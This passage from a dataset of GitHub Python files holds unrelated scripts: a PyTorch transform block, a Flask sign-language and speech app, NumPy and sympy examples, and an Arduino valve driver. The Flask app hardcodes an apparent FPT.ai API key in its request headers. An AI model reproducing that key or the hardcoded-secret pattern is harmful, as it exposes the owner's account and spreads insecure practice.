np.zeros((2, N // 2 - 2)),\n ],\n [\n np.zeros((N // 2 - 2, 2)),\n np.eye(N // 2 - 2),\n np.zeros((N // 2 - 2, 2)),\n np.eye(N // 2 - 2),\n ],\n [\n Bn1,\n np.zeros((2, N // 2 - 2)),\n Bn2,\n np.zeros((2, N // 2 - 2)),\n ],\n [\n np.zeros((N // 2 - 2, 2)),\n np.eye(N // 2 - 2),\n np.zeros((N // 2 - 2, 2)),\n -np.eye(N // 2 - 2),\n ],\n ]\n )\n\n S_N = (\n 1\n / np.sqrt(2)\n * np.matmul(S_N, block_diag(S_prev, S_prev))\n )\n S_prev = S_N\n i += 1\n return S_prev\n\n s = slant(min(size, 8)) # /np.sqrt(32)\n f = np.dot(s[i, :size].reshape(-1, 1), s[j, :size].reshape(1, -1))\n return torch.as_tensor(f)\n\n def forward(self, x):\n in_ = x\n x = F.conv2d(\n x.float(),\n weight=self.filter_bank,\n padding=self.padding,\n stride=self.stride,\n groups=self.input_channels,\n ) # int(self.K/\n x = self.alpha_rooting(x, alpha=self.alpha_root)\n if self.noise is not None:\n x.add_(self.noise.unsqueeze(-1).unsqueeze(-1))\n if self.bn:\n x = F.relu(self.bnorm(x))\n else:\n x = F.relu(x)\n if self.drop:\n x = self.dropout(x)\n if self.use_res:\n x = self.conv(x) + self.shortcut(in_)\n else:\n x = self.conv(x)\n x = F.relu(x) # ?? 
do we need this relu layer?\n return x\n\n\nclass ResNextTransofrmBlock(nn.Module):\n expansion = 2\n\n def __init__(\n self,\n input_channels,\n cardinality,\n transform_conv,\n bottleneck_width=4,\n stride=1,\n ):\n super(ResNextTransofrmBlock, self).__init__()\n\n self.conv0 = transform_conv(\n input_channels, kernel_size=3, padding=1, stride=1, lmbda=2\n )\n self.bn0 = nn.BatchNorm2d(self.conv0.filter_bank.size(0))\n group_width = cardinality * bottleneck_width\n self.linear = nn.Conv2d(\n in_channels=self.conv0.filter_bank.shape[0],\n out_channels=group_width,\n kernel_size=1,\n padding=0,\n stride=1,\n bias=False,\n )\n self.bn1 = nn.BatchNorm2d(group_width)\n self.conv2 = nn.Conv2d(\n group_width,\n group_width,\n kernel_size=3,\n stride=stride,\n padding=1,\n groups=cardinality,\n bias=False,\n )\n self.bn2 = nn.BatchNorm2d(group_width)\n self.conv3 = nn.Conv2d(\n group_width,\n self.expansion * group_width,\n kernel_size=1,\n bias=False,\n )\n self.bn3 = nn.BatchNorm2d(self.expansion * group_width)\n self.shortcut = nn.Sequential()\n if stride != 1 or input_channels != self.expansion * group_width:\n self.shortcut = nn.Sequential(\n nn.Conv2d(\n input_channels,\n self.expansion * group_width,\n kernel_size=1,\n stride=stride,\n bias=False,\n ),\n nn.BatchNorm2d(self.expansion * group_width),\n )\n\n def forward(self, x):\n # transform -> normalize -> activate -> linear combination\n out = self.linear(F.relu(self.bn0(self.conv0(x))))\n out = F.relu(self.bn1(out))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n\n return out\n\n\ndef test():\n return\n\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"iliailmer/transform_based_module","sub_path":"layers/transform_blocks.py","file_name":"transform_blocks.py","file_ext":"py","file_size_in_byte":18654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"11566790111","text":"import keyboard #pip install keyboard\nfrom camera import VideoCamera\nfrom flask import Flask, render_template, Response, stream_with_context, request\nimport cv2\nfrom sign_to_text import Sign2Text\nfrom time import sleep\nimport requests\nimport ffmpeg\nimport speech_recognition as sr\n\napp = Flask(__name__)\n# camera = cv2.VideoCapture(0)\nSign2Text_model = Sign2Text(cnn_model_path='./Model/InceptionV3_30epochs.h5', knn_model_path='./knn_model.sav')\nframe = None\nstart_point = (50, 50)\nwidth = 300\nheight = 300\nend_point = (start_point[0] + width, start_point[1] + height)\ncolor = (255, 0, 0)\nthickness = 2\ntext_display = ''\n\ndef gen_frames(camera):\n global frame\n while True:\n success, frame = camera.read() # read the camera frame\n frame = cv2.flip(frame, 1)\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n if not success:\n break\n else:\n _, buffer = cv2.imencode('.jpg', frame)\n frame_bytes = buffer.tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame_bytes + b'\\r\\n') # concat frame one by one and show result\n\ndef sign2text():\n global frame\n if frame is None:\n return None\n img = frame[start_point[1]:start_point[1] + height, start_point[0]:start_point[0] + width, :]\n pred_class, prob = Sign2Text_model.predict(img)\n return pred_class\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('layout.html')\n\n@app.route('/video_feed')\ndef video_feed():\n return Response(gen_frames(VideoCamera()), 
mimetype='multipart/x-mixed-replace; boundary=frame')\n\n@app.route('/text_feed')\ndef text_feed():\n    global text_display\n    pred_word = sign2text()\n    text_display += pred_word\n    return text_display\n\n@app.route('/test_mic')\ndef test():\n    return render_template('test_mic.html')\n\n@app.route('/speech2text', methods=['POST'])\ndef speech2text():\n    file = request.files['file']\n    inp_file = 'upload/uploaded_record.wav'\n    file.save(inp_file)\n\n    out_file = \"./upload/uploaded_record_conv.wav\"\n    ffmpeg.input(inp_file).output(out_file, ar=16000, ac=1, ab=256000).overwrite_output().run()\n    r = sr.Recognizer()\n    with sr.AudioFile(out_file) as source:\n        audio = r.listen(source)\n    try:\n        text = r.recognize_google(audio,language=\"vi-VI\")\n        return text\n    except:\n        return \"Xin lỗi! tôi không nhận được voice!\"\n\n@app.route('/text2speech', methods=['GET'])\ndef text2speech():\n    global text_display\n    url = 'https://api.fpt.ai/hmi/tts/v5'\n    input_text = text_display\n    text_display = \"\"\n    # input_text = 'xin chào mọi người ở shecodes hackathon'\n    voice_option = ['leminh', 'thuminh']\n    voice_id = int(request.args.get('voice'))\n\n    headers = {\n        'api-key': '1AGd8nuJW3sz3qbfyAwqii1XHPrBZAlA',\n        'speed': '',\n        'voice': voice_option[voice_id]\n    }\n    response = requests.request('POST', url, data=input_text.encode('utf-8'), headers=headers)\n    return response.json()['async']\n    \nif __name__ == '__main__':\n    app.run(host='localhost', debug=True)","repo_name":"tlhnhi/shape-of-voice","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"2464411146","text":"#Define a list of several numbers. 
Write a program that finds the sum of the list elements standing at odd positions.\n#Example:\n#- [2, 3, 5, 9, 3] -> the elements at odd positions are 3 and 9, answer: 12\nfrom random import randint\ndef GetNum():\n    result = 0\n    while True:\n        a = int(input('Enter the array length: '))\n        if a > 0:\n            result = a\n            break\n    return result\n\ndef GivList(a):\n    inList = []\n    for i in range(a):\n        inList.append(randint(1, 10))\n    return inList\n\ndef SumPoss(a):\n    summ = 0\n    for i in range(len(a)):\n        if i % 2 != 0:\n            summ += a[i]\n    return summ\n\nsize = GetNum()\nresList = GivList(size)\nbattary = SumPoss(resList)\nprint(f'The sum of the elements at odd positions in the list {resList} is {battary}')","repo_name":"MilyavichusEvgenii/homeWorkPython","sub_path":"lesson_03/task_0001.py","file_name":"task_0001.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"5445996434","text":"\"\"\"ode_system.py: \n\n\"\"\"\n \n__author__ = \"Dilawar Singh\"\n__copyright__ = \"Copyright 2017-, Dilawar Singh\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Dilawar Singh\"\n__email__ = \"dilawars@ncbs.res.in\"\n__status__ = \"Development\"\n\nimport sys\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sympy as _s\nfrom sympy.abc import *\n\ndef system( ):\n    A, B, C = _s.symbols( \"A B C\", cls=_s.Function)\n    t = _s.abc.t\n    eq1 = _s.Eq(A(t).diff(t), 1)\n    eq2 = _s.Eq(B(t).diff(t), 2)\n    return (eq1, eq2), (A,B)\n\ndef main():\n    _s.init_printing()\n    sys, vs = system()\n    r = _s.dsolve(sys, vs)\n    print( r )\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"dilawar/playground","sub_path":"Sympy/ode_system.py","file_name":"ode_system.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"99"} +{"seq_id":"15639598126","text":"\nfrom pyfirmata import Arduino, util\nimport time\nimport matplotlib.pyplot as plt\n\nboard = Arduino(\"/dev/cu.usbmodem14201\")\n\npin = board.get_pin('a:0:i')\n\nit = util.Iterator(board)\nit.start()\ndata =[] \n\nt_end = time.time() + 3\n\nwhile time.time() < t_end:\n    value = pin.read()\n    data.append(value)\n\nplt.plot(data)\nplt.xlabel('Time')\nplt.ylabel('Analog input')\nplt.title('Analog pin reading')\nplt.show()\n\n","repo_name":"nurobio/Acoustic_beamforming_for_the_hearing_aid","sub_path":"arduino_test_pyfirmata.py","file_name":"arduino_test_pyfirmata.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"18374720187","text":"import numpy as np\n\n\"\"\"\nWays to create ndarray arrays\n\"\"\"\n\n# 1. Create from Python data types; the concrete type is determined by the underlying Python type\n# List\nx = np.array([0, 1, 2, 3])\nprint(x)\n# Tuple\nx = np.array((0, 1, 2, 3))\nprint(x)\n# Mixed\nx = np.array([\n    [1, 2],\n    [9, 8],\n    (0.1, 0.2)\n])\nprint(x)\n# 2. 
Create with the functions provided by NumPy\n# np.arange(n)\n# np.ones(shape)  generated according to the given shape\n# np.zeros(shape)\n# np.full(shape, val)\n# np.eye(n)  square n*n matrix, 1 on the diagonal, 0 elsewhere\n","repo_name":"snail-tech/Python-Notes","sub_path":"numpy_ex/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"36358456942","text":"import PyCmdMessenger\nimport time\nimport os\nimport logging\n\n\nif os.name == 'nt':\n    comPort = \"COM8\"\nelse:\n    comPort = '/dev/ttyUSB0'\n\n_current_port_id = 1\n\narduino = PyCmdMessenger.ArduinoBoard(comPort,baud_rate=115200,timeout=10)\n\n\n# List of command names (and formats for their associated arguments). These must\n# be in the same order as in the sketch.\ncommands = [[\"kWatchdog\",\"s\"],\n            [\"kAcknowledge\",\"s\"],\n            [\"kError\",\"s\"],\n            [\"kOpenValve\",\"i\"],\n            [\"kCloseValve\",\"i\"],\n            [\"kStartPump\",\"\"],\n            [\"kStopPump\",\"\"],\n            [\"kSetPumpSpeed\",\"f\"]]\n\n\n# Initialize the messenger\ncomm = PyCmdMessenger.CmdMessenger(arduino,commands)\n#Wait for arduino to come up\nmsg = comm.receive()\nprint(msg)\n\n\ndef open_Valve(valveNumber: int) -> int:\n\n    # valid valve numbers are 0-7\n    if(valveNumber >=0 and valveNumber <=7):\n        comm.send(\"kOpenValve\",valveNumber)\n        msg = comm.receive()\n        logging.info(\"Opened valve number \" + str(valveNumber))\n\n    else:\n        logging.info(\"Valve number not recognized\")\n        return 1\n    \n    return 0\n\n\ndef close_Valve(valveNumber: int) -> int:\n\n    if(valveNumber >=0 and valveNumber <=7):\n        comm.send(\"kCloseValve\",valveNumber)\n        msg = comm.receive()\n        logging.info(\"Closed valve number \" + str(valveNumber))\n\n    else:\n        logging.info(\"Valve number not recognized\")\n        return 1\n    \n    return 0\n\ndef set_Pump_Speed(speed: int) -> int:\n\n    if(speed >=0 and speed <=100):\n        comm.send(\"kSetPumpSpeed\",speed)\n        msg = comm.receive()\n        logging.info(\"Set pump speed to \" + str(speed))\n\n    else:\n        logging.info(\"Pump speed out of bounds\")\n        return 1\n    \n    return 0\n\n\ndef start_Pump() -> int:\n    \"\"\"Start the pump.\"\"\"\n    comm.send(\"kStartPump\")\n\n    msg = comm.receive()\n    logging.info(msg[1])\n\n    return 0\n\n\ndef stop_Pump() -> int:\n    \"\"\"Stop the pump.\"\"\"\n    comm.send(\"kStopPump\")\n\n    msg = comm.receive()\n    logging.info(msg[1])\n\n    return 0","repo_name":"BIG-MAP/wp4-LLE","sub_path":"Detection/Software/software/Drivers/ValveAndMixingCmd/ValveAndMixingCmdDriver.py","file_name":"ValveAndMixingCmdDriver.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"16653717297","text":"\"\"\"This file contains the functions for service3 Implementation 1 & 2.\n\nOn a GET request, we want our program to provide a list of note lengths\nfor our user to pick from.\n\nOn a POST request, we want our program to return a random note length.\"\"\"\n\n# Imports --------------------------------------------------------------\n\nimport random\n\nfrom os import environ\n\nfrom flask import Flask, request, jsonify\n\n# Flask ----------------------------------------------------------------\n\n# Create our flask application.\n\nservice3 = Flask(__name__)\n\nif environ.get(\"FLASK_ENV\").replace('\"', '') == 'production':\n    service3.config.from_object('service3_config.ProductionConfig')\n\nelif environ.get(\"FLASK_ENV\").replace('\"', '') == 'testing':\n    
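# FLASK_ENV == 'testing' selects the testing configuration; any other value falls through to the development config below.\n    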
service3.config.from_object('service3_config.TestingConfig')\n\nelse:\n service3.config.from_object('service3_config.DevelopmentConfig')\n\n\n# On GET Request -------------------------------------------------------\n# Helper Functions -----------------------------------------------------\n\ndef return_rhythms_dictionary():\n \"\"\"This function is to be used with a GET request, returning a list of\n note lengths for our user to select from.\n\n Service #1 requires a list of note lengths for our user to chose from. The\n different implementations of service #3 will alter these pitch lists.\n\n When Service #3 receives a GET request, it will send the output of this\n function.\n \"\"\"\n\n # TODO: Write unit test for return_rhythms_dict() with API functionality.\n\n rhythms_dictionary = {\n \"short\": [4, 8, 16, 32],\n \"long\": [1, 2, 4],\n \"standard\": [2, 4, 8, 16],\n \"extremes\": [1, 32, 64, 128],\n \"png implementation\": [4, 8, 16, 32]\n }\n\n return rhythms_dictionary\n\n\n# Function -------------------------------------------------------------\n\n\n@service3.route('/', methods=['GET'])\ndef on_get_request():\n \"\"\"This function triggers after every get request to the endpoint '/'\"\"\"\n\n return jsonify(return_rhythms_dictionary())\n\n\n# On POST Request ------------------------------------------------------\n# Helper Functions -----------------------------------------------------\n\ndef random_note_length(common_rhythms):\n \"\"\"This function is to be used with a POST request, generating a random\n note length from a given list.\n\n Keyword Arguments:\n common_rhythms: A list of common note rhythms, in Mingus format.\n \"\"\"\n return random.choice(common_rhythms)\n\n\n# Function -------------------------------------------------------------\n\n\n@service3.route('/', methods=['POST'])\ndef on_post_request():\n \"\"\"This function triggers after every post request to the endpoint '/'\n We expect to receive a specific set of rhythms from service 1, in JSON\n format.\n\n We parse the JSON with function 'request.get_json(). This turns it into\n a python dictionary.\n\n We convert this dictionary into a list. Annoyingly because our data is\n already encapsulated as a list, this method creates a 'list inside a list'\n This is why we must use index[0] to retrieve our data.\n\n We then run this data through our random function, to return a note length.\n\n \"\"\"\n received_data = request.get_json()\n\n converted_data = list(received_data.values())\n note_length_output = random_note_length(converted_data[0])\n return jsonify(note_length_output)\n","repo_name":"joshuahigginson1/DevOps_Assessment_2","sub_path":"service3/src/service3.py","file_name":"service3.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"}